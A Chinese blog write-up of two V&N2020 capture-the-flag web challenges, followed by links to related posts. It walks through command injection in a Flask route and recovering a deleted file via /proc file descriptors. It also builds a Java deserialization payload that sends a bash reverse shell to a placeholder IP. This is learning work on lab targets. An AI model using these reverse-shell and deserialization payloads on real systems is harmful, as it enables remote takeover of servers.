[V&N2020 公开赛]

于 2024-06-05 20:12:14 发布
阅读量1k 收藏 23
点赞数 8
文章标签: web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756016/article/details/139420404
版权

Web

CHECKIN

启动!

还原代码

from flask import Flask, request 
import os 
app = Flask(__name__) 
flag_file = open("flag.txt", "r") 
# flag = flag_file.read() 
# flag_file.close() 
# # @app.route('/flag') 
# def flag(): # return flag 
## want flag? naive! 
# You will never find the thing you want:) I think 

@app.route('/shell')
def shell(): 
    os.system("rm -f flag.txt") 
    exec_cmd = request.args.get('c') 
    os.system(exec_cmd) 
    return "1" 

@app.route('/') 
def source(): return open("app.py","r").read() 
if __name__ == "__main__": app.run(host='0.0.0.0')

有两个路由,/shell路由执行删除flag.txt,并且执行url中的c参数,但return 1,没有回显结果。实践一下

 RCE这条路被封死了一半,再看看全文,发现代码中flag_file = open("flag.txt", "r"),这里有一个考点。

在 linux 系统中一个程序打开了一个文件没有关闭,即便从外部删除(rm只是删除了其相应的目录索引节点,没有删除进程),在 /proc 这个进程的 pid 目录下的 fd 文件描述符目录下还是会有这个文件的 fd,而fd里有文件的内容,通过这个我们即可得到被删除文件的内容。

那怎么获得这个fd呢?

只能靠遍历获得

先去自己虚拟机看看/proc这个目录

可以看到有大量的编号

随便进入一个编号继续查看

所以这个路径的特点为 /proc/*/fd/*

因为代码中的命令执行没有回显结果,我们就只能尝试反弹shell,因为本次题目的buuctf靶机不访问外网,所以我们创另外一个小号去打开linux labs靶机,ssh登录,执行监听,就能收到

ssh连接

查看ip 

结果我弹了几次shell没什么反应,又去看了看labs的靶机

行吧,试试弹自己的vps 

 成功了

cat /proc/*/fd/* 2>/dev/null

直接获得flag

EasySpringMVC

先下载附件打开

一看就是要让我们java代码审计,不会java啊?硬学!

此题代码不多,就三个主要代码,就当做入门java审计的第一题了

首先是ClentInfoFilter

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package com.filters;

import com.tools.ClientInfo;
import com.tools.Tools;
import java.io.IOException;
import java.util.Base64;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class ClentInfoFilter implements Filter {
    public ClentInfoFilter() {
    }

    public void init(FilterConfig fcg) {
    }

    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
        Cookie[] cookies = ((HttpServletRequest)request).getCookies();
        boolean exist = false;
        Cookie cookie = null;
        if (cookies != null) {
            Cookie[] var7 = cookies;
            int var8 = cookies.length;

            for(int var9 = 0; var9 < var8; ++var9) {
                Cookie c = var7[var9];
                if (c.getName().equals("cinfo")) {
                    exist = true;
                    cookie = c;
                    break;
                }
            }
        }

        byte[] bytes;
        if (exist) {
            String b64 = cookie.getValue();
            Base64.Decoder decoder = Base64.getDecoder();
            bytes = decoder.decode(b64);
            ClientInfo cinfo = null;
            if (!b64.equals("") && bytes != null) {
                try {
                    cinfo = (ClientInfo)Tools.parse(bytes);
                } catch (Exception var14) {
                    var14.printStackTrace();
                }
            } else {
                cinfo = new ClientInfo("Anonymous", "normal", ((HttpServletRequest)request).getRequestedSessionId());
                Base64.Encoder encoder = Base64.getEncoder();

                try {
                    bytes = Tools.create(cinfo);
                } catch (Exception var15) {
                    Exception e = var15;
                    e.printStackTrace();
                }

                cookie.setValue(encoder.encodeToString(bytes));
            }

            ((HttpServletRequest)request).getSession().setAttribute("cinfo", cinfo);
        } else {
            Base64.Encoder encoder = Base64.getEncoder();

            try {
                ClientInfo cinfo = new ClientInfo("Anonymous", "normal", ((HttpServletRequest)request).getRequestedSessionId());
                bytes = Tools.create(cinfo);
                cookie = new Cookie("cinfo", encoder.encodeToString(bytes));
                cookie.setMaxAge(86400);
                ((HttpServletResponse)response).addCookie(cookie);
                ((HttpServletRequest)request).getSession().setAttribute("cinfo", cinfo);
            } catch (Exception var13) {
                var13.printStackTrace();
            }
        }

        chain.doFilter(request, response);
    }

    public void destroy() {
    }
}

先看第一个核心代码点

    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
        Cookie[] cookies = ((HttpServletRequest)request).getCookies();
        //定义且初始化一个类型为Cookie的数组,并赋值给变量cookies
        boolean exist = false;
        Cookie cookie = null; //定义一个类型为Cookie的变量cookie,并初始化为null
        if (cookies != null) {
            Cookie[] var7 = cookies; //定义了一个Cookie类型的变量为var7,且赋值为变量cookies。联系上下文,就是定义了一个临时变量,用于存储 cookies 数组的引用。
            int var8 = cookies.length;

            for(int var9 = 0; var9 < var8; ++var9) { //循环数组
                Cookie c = var7[var9];  //变量c存储每次遍历的值
                if (c.getName().equals("cinfo")) { //equals 是 String 类中的一个方法,用于比较两个字符串的内容是否相等。这里就是看cookie的name是否等于cinfo
                    exist = true;
                    cookie = c; //等于cinfo,就赋值为给cookie
                    break;
                }
            }
        }

这段代码就是在获取cookie,并且看cookie的name是否为cinfo 

这里刚开始看的时候,cookies和cookie都看岔了,看得我极其混乱,还以为在初始化cookies的值,云里雾里。

下一个核心代码

        byte[] bytes;
        if (exist) {
            String b64 = cookie.getValue();
            Base64.Decoder decoder = Base64.getDecoder();
            bytes = decoder.decode(b64);
            ClientInfo cinfo = null;
            if (!b64.equals("") && bytes != null) {
                try {
                    cinfo = (ClientInfo)Tools.parse(bytes);
                } catch (Exception var14) {
                    var14.printStackTrace();
                }
            } else {
                cinfo = new ClientInfo("Anonymous", "normal", ((HttpServletRequest)request).getRequestedSessionId());
                Base64.Encoder encoder = Base64.getEncoder();

                try {
                    bytes = Tools.create(cinfo);
                } catch (Exception var15) {
                    Exception e = var15;
                    e.printStackTrace();
                }

                cookie.setValue(encoder.encodeToString(bytes));
            }

            ((HttpServletRequest)request).getSession().setAttribute("cinfo", cinfo);
        } else {
            Base64.Encoder encoder = Base64.getEncoder();

            try {
                ClientInfo cinfo = new ClientInfo("Anonymous", "normal", ((HttpServletRequest)request).getRequestedSessionId());
                bytes = Tools.create(cinfo);
                cookie = new Cookie("cinfo", encoder.encodeToString(bytes));
                cookie.setMaxAge(86400);
                ((HttpServletResponse)response).addCookie(cookie);
                ((HttpServletRequest)request).getSession().setAttribute("cinfo", cinfo);
            } catch (Exception var13) {
                var13.printStackTrace();
            }
        }

存在'cinfo'Cookie的情况:进行base64解密,再进行调用Tools的parse方法

不存在'cinfo'Cookie的情况:创建一个新的ClientInfo对象,并将其序列化为字节数组,然后创建一个新的Cookie并添加到响应中

接下来简单看了一下ClientInfo类的代码

package com.tools;

import java.io.Serializable;

public class ClientInfo implements Serializable {
    private static final long serialVersionUID = 1L;
    private String name;
    private String group;
    private String id;

    public ClientInfo(String name, String group, String id) {
        this.name = name;
        this.group = group;
        this.id = id;
    }

    public String getName() {
        return this.name;
    }

    public String getGroup() {
        return this.group;
    }

    public String getId() {
        return this.id;
    }
}

就目前来看的这部分代码,就是在设置cookie的一系列身份 组别等。

看看Tools的代码

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package com.tools;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

public class Tools implements Serializable {
    private static final long serialVersionUID = 1L;
    private String testCall;

    public Tools() {
    }

    public static Object parse(byte[] bytes) throws Exception {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes));
        return ois.readObject();
    }

    public static byte[] create(Object obj) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream outputStream = new ObjectOutputStream(bos);
        outputStream.writeObject(obj);
        return bos.toByteArray();
    }

    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        Object obj = in.readObject();
        (new ProcessBuilder((String[])((String[])obj))).start();
    }
}

 可以看到 parse方法在反序列化,create方法在序列化,还自定义了readObject方法。

着重分析一下这个readObject方法

(new ProcessBuilder((String[])((String[])obj))).start();
(String[])((String[])obj))

这是一个嵌套的类型转换,先把obj强行转换为string,又进行了一次string转换

new ProcessBuilder

ProcessBuilder是一个Java类,用于创建操作系统进程。也就是说把obj转换为string类型,就直接作为参数,来执行命令等操作。

这里造成了一个java反序列化漏洞,可以控制反序列化的数据,通过发送特定的String数组来执行任意系统命令。

再看看PictureController

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package com.controller;

import com.tools.ClientInfo;
import java.io.File;
import java.io.FileInputStream;
import java.io.InputStream;
import java.io.OutputStream;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.apache.commons.fileupload.disk.DiskFileItem;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.multipart.MultipartFile;
import org.springframework.web.multipart.commons.CommonsMultipartFile;

@Controller
public class PictureController {
    public PictureController() {
    }

    @RequestMapping({"/showpic.form"})
    public String index(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse, String file) throws Exception {
        if (file == null) {
            file = "showpic.jsp";
        }

        String[] attribute = file.split("\\.");
        String suffix = attribute[attribute.length - 1];
        if (!suffix.equals("jsp")) {
            boolean isadmin = ((ClientInfo)httpServletRequest.getSession().getAttribute("cinfo")).getName().equals("admin");
            if (isadmin || suffix.equals("jpg") && suffix.equals("gif")) {
                this.show(httpServletRequest, httpServletResponse, file);
                return "showpic";
            } else {
                return "onlypic";
            }
        } else {
            StringBuilder stringBuilder = new StringBuilder();

            int unixSep;
            for(unixSep = 0; unixSep < attribute.length - 1; ++unixSep) {
                stringBuilder.append(attribute[unixSep]);
            }

            String jspFile = stringBuilder.toString();
            unixSep = jspFile.lastIndexOf(47);
            int winSep = jspFile.lastIndexOf(92);
            int pos = winSep > unixSep ? winSep : unixSep;
            jspFile = pos != -1 ? jspFile.substring(pos + 1) : jspFile;
            if (jspFile.equals("")) {
                jspFile = "showpic";
            }

            return jspFile;
        }
    }

    private void show(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse, String filename) throws Exception {
        httpServletResponse.setContentType("image/jpeg");
        InputStream in = httpServletRequest.getServletContext().getResourceAsStream("/WEB-INF/resource/" + filename);
        if (in == null) {
            in = new FileInputStream(filename);
        }

        OutputStream os = httpServletResponse.getOutputStream();
        byte[] b = new byte[1024];

        while(((InputStream)in).read(b) != -1) {
            os.write(b);
        }

        ((InputStream)in).close();
        os.flush();
        os.close();
    }

    @RequestMapping({"/uploadpic.form"})
    public String upload(MultipartFile file, HttpServletRequest request, HttpServletResponse response) throws Exception {
        ClientInfo cinfo = (ClientInfo)request.getSession().getAttribute("cinfo");
        if (!cinfo.getGroup().equals("webmanager")) {
            return "notaccess";
        } else if (file == null) {
            return "uploadpic";
        } else {
            String originalFilename = ((DiskFileItem)((CommonsMultipartFile)file).getFileItem()).getName();
            String realPath = request.getSession().getServletContext().getRealPath("/WEB-INF/resource/");
            String path = realPath + originalFilename;
            file.transferTo(new File(path));
            request.getSession().setAttribute("newpicfile", path);
            return "uploadpic";
        }
    }
}

这段代码就不讲的仔细了,该类有三个功能,1.展示图片 2.展示图片的一些设置,把相应类型变为image/jpeg等一些操作 3.上传图片

但仔细观察代码,可以发现展示图片要为admin才能查看,上传图片要组别为webmanager才能上传。

审计代码到目前,发现有两个攻击面,一是直接命令执行,二是通过上传图片这里,说不定能实现目录穿越。

那肯定选命令执行。

重写Tools的writeObject

private void writeObject(ObjectOutputStream out) throws IOException {
//       
        out.writeObject((new String[]{"bash","-c","bash -i >& /dev/tcp/your_ip/1234 0>&1"}));
    }

把重写完的代码粘贴去新的一个java项目,再创建一个App.java

import java.util.Base64;


public class App {
    public static void main(String[] args) {
        Base64.Encoder encoder = Base64.getEncoder();
        try {
            Tools cinfo = new Tools();
            byte[] bytes = Tools.create(cinfo);
            String payload = encoder.encodeToString(bytes);
            System.out.println(payload);
        } catch (Exception e) {
            e.printStackTrace();
        }

    }
}

这个代码实现创建Tools对象并且序列化,再base64加密结果

修改cookies,再刷新页面

 结果一直弹不了,换了两台服务器都弹不了。最后怀疑是不是没出网,又开了一个弹内网的,结果后面直接靶场崩了,靶机还销毁不了了。。。

阿呆不呆@qq
关注
[V&N2020 公开赛]CRT(中国剩余定理模数不互质)
weixin_44110537的博客
07-16 848
加密脚本 import hashlib from functools import reduce from Crypto.Util.number import * ms = [getRandomNBitInteger(128) for i in range(8)] p = reduce(lambda x,y: x*y, ms) x = getRandomRange(1, p) cs = [x % m for m in ms] flag = "flag{" + hashlib.sha256(str(x)
BUUCTF-CRYPTO-[V&N2020 公开赛]Backtrace
zippo1234的博客
10-25 1149
BUUCTF-CRYPTO-[V&N2020 公开赛]Backtrace[V&N2020 公开赛]Backtrace题目分析开始1.题目2.分析(1)MT19937算法生产随机数的过程(2)逆向 extract_number(3)逆向twist3.解题思路4.脚本5.get flag结语 每天一题,只能多不能少 [V&N2020 公开赛]Backtrace 题目分析 1、MT19937随机数破解 2、随机数状态state逆向破解 开始 1.题目 题目很简单,给了生产脚本backtra
[V&N2020 公开赛 web]
weixin_43610673的博客
04-05 1089
HappyCTFd CVE-2020-7245 https://nvd.nist.gov/vuln/detail/CVE-2020-7245 https://www.colabug.com/2020/0204/6940556/ 开始以为是注入,尝试了好一会无从下手,然后看wp知道是cve。。。https://www.zhaoj.in/read-6407.html 注册一个 admin用户...
[V&N2020 公开赛]内存取证
volcano的博客
04-08 4804
题目地址: https://buuoj.cn/challenges#[V&N2020 公开赛]内存取证 这题用到的内存取证分析工具是Volatility 关于这个工具的具体命令非常多,可以在官方页面仔细看看 解题 先下载上面的附件,这种raw文件是内存取证工具Dumpit提取内存生成的内存转储文件。 ...
BUUCTF Crypto [V&N2020 公开赛]easy_RSA wp
hsqGOD's blog
04-21 1846
这道题我们看到加密的脚本,首先我们可以关注到,这题目的素数生成机制是不断的乘然后再减一可以得到素数,我们可以发现,因子p再加一也就是p+1是光滑到,于是我们可以使用Williams’p+1 algorithm求解 可以直接调用库的函数 // 命令行调用即可 python2 -m primefac -vs -m=p+1 794137173995657728016066441938374096751...
[V&N2020 公开赛]Fast
weixin_44110537的博客
07-18 717
考点 1,费马小定理 2,中国剩余定理 加密脚本 from Crypto.Util.number import * from secret import flag p = getPrime(1024) q = getPrime(1024) N = p * q g, r1, r2 = [getRandomRange(1, N) for _ in range(3)] g1 = pow(g, r1 * (p-1), N) g2 = pow(g, r2 * (q-1), N) def encrypt(m)
BUUCTF [V&N2020 公开赛]simpleHeap
BengDouLove的博客
04-17 1127
保护机制全开的程序,也无法利用got表,,只能覆盖 malloc_hook 或者 free_hook 堆的题要好好分析代码 T T 1.add sub_AB2 是到heap_got (储存堆指针的表)里面找第一个空着的堆序号返回给v1,没有可用的就返回-1,最多申请10个堆 之后输入堆的大小,最大是 111,也就是0x6F,,加上chunk头是0x7F ,也就是申请的堆只能fastbin...
BUUCTF [V&N2020 公开赛]babybabypwn
BengDouLove的博客
04-10 1071
先看一下,,所有保护机制都开启了 进入main的第二个函数,里面是这一堆东西 查了一下这个是沙盒机制,seccomp ,,这个seccomp_rule_add函数是给这个沙盒添加规则,意思是这个函数不能调用 这个函数的第三个参数,是代表函数的number,,别的不太清楚,网上也没有查到。。但是 59号代表的是execve函数 所以这个函数不能被调用,,也就是说无法得到系统权限了(吧) 所以这样...
buuctf——[V&N2020 公开赛]strangeCpp && buuctf——[BJDCTF2020]easy && buuctf——[ACTF新生赛2020]usualCrypt
Dicked的博客
12-06 297
[V&N2020 公开赛]strangeCpp 交叉引用,看伪c,应该是mian函数 24-31输出了字符串 welcome,应该就是这里了。。多了byte_140021008 就这个函数,看到putchar函数里面有刚刚看见的字符串,有flag那味儿了。 从尾开始搞,打印的肯定是flag了,就是dword_140021190这一段和刚刚找到的字符串逐个异或,然后就是找dword_140021190这一段是啥了 这里应该是对dword_140021190进行了操作的,进去看看sub_1
[V&N2020 公开赛]easyTHeap + ciscn_2019_final_3 ——heap中tcache的一些简单利用方法
PLpa的博客
06-06 1094
在libc2.26之后的libc版本中加入了新的存储结构tcache,这使得我们利用堆的时候要特别注意libc版本。 对tcache不是很了解建议看看CTFWiKi 1.[V&N2020 公开赛]easyTHeap 保护全开,libc2.27版本,进入IDA 看到程序有增删改查的功能。 我们一个个来看: add: 我们可以看到add中不能写入数据。 edit: add中不能读入的数据由edit来读入。 show: 没什么特殊的,就是输出数据,这里我们可以用其来查看我们泄露的地址。 dele
BUUCTF:[V&N2020 公开赛]拉胯的三条命令
末初的CSDN博客
11-03 1043
题目地址:https://buuoj.cn/challenges#[V&N2020%20%E5%85%AC%E5%BC%80%E8%B5%9B]%E6%8B%89%E8%83%AF%E7%9A%84%E4%B8%89%E6%9D%A1%E5%91%BD%E4%BB%A4 题目文件zip zip文件,添加后缀zip 说明.txt 在参加网络安全大赛第二届世界巡回赛新加坡站一场与SP战队的比赛时,作为K&K战队主防手的你使用经典的“三条命令”检查端口封闭状况。可是这次比赛平台没有回显,.
2021-07-05
mxx307的博客
07-06 309
2021.7.5每日三题一、又是CRT([V&N2020 公开赛]CRT改)题目解题思路解题脚本二、弗洛伊德(Floyd)BKZ(【红帽杯】primegame) 一、又是CRT([V&N2020 公开赛]CRT改) 题目 import hashlib from functools import reduce from Crypto.Util.number import * ms = [getRandomNBitInteger(128) for i in range(8)] p = redu
Night的数学杂谈——模数不互质的CRT
Night2002的博客
08-22 422
前置技能点要求懂得基础的数论知识和扩展欧几里德算法 有关于前置技能点的东西不会就别问我了。 写挂哪里请评论戳我。 进入正题 我们要合并同余方程 {x≡r1(modm1)x≡r2(modm2){x≡r1(modm1)x≡r2(modm2)\begin{cases}x\equiv r_1\pmod{m_1} \\ x\equiv r_2\pmod{m_2}\end{cases} 即: {...
[MRCTF2020]Easy_RSA 1 利用到的不等式
最新发布
学习,再学习
09-09 189
在确定不了一个数的范围时,可以用已知的数对该数计算不等式。
BUUCTF RSA题目全解4
MikeCoke的博客
12-19 3838
1.[MRCTF2020]babyRSA 题目 import sympy import random from gmpy2 import gcd, invert from Crypto.Util.number import getPrime, isPrime, getRandomNBitInteger, bytes_to_long, long_to_bytes from z3 import * flag = b"MRCTF{xxxx}" base = 65537 def GCD(A): B =
[V&N2020 公开赛]HappyCTFd
weixin_45689999的博客
03-04 1454
[V&N2020 公开赛]HappyCTFd 网站里除了user里面有一个admin有信息,其他页面和F12没有可用信息 所以猜测flag是在admin里面的,就是要登录admin账户 是一个账户接管漏洞,参考大佬bloghttps://www.colabug.com/2020/0204/6940556/amp/ 所以步骤就是 利用添加空格绕过限制来注册一个与受害者用户名相同的账号 生成忘...
re学习笔记(47)BUUCTF-re-[V&N2020 公开赛]strangeCpp
逆向随笔
03-01 1638
新手一枚,如有错误(不足)请指正,谢谢!! 个人博客:点击进入 main()函数没啥东西…… 找好久… putchar字节这里,中间夹杂着数据…… 然后交叉引用,来到这里 其中sub_140011384()函数,将dword_140021190操作得到result 然后result要等于607052314,dword_140021190要小于等于14549743 缩小爆破范围…… 写脚本 ...
2020 年 V&N 内部考核赛 WriteUp
a3320315的博客
03-01 2663
CheckIN 源码 from flask import Flask, request import os app = Flask(__name__) flag_file = open("flag.txt", "r") # flag = flag_file.read() # flag_file.close() # # @app.route('/flag') # def flag(): # ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值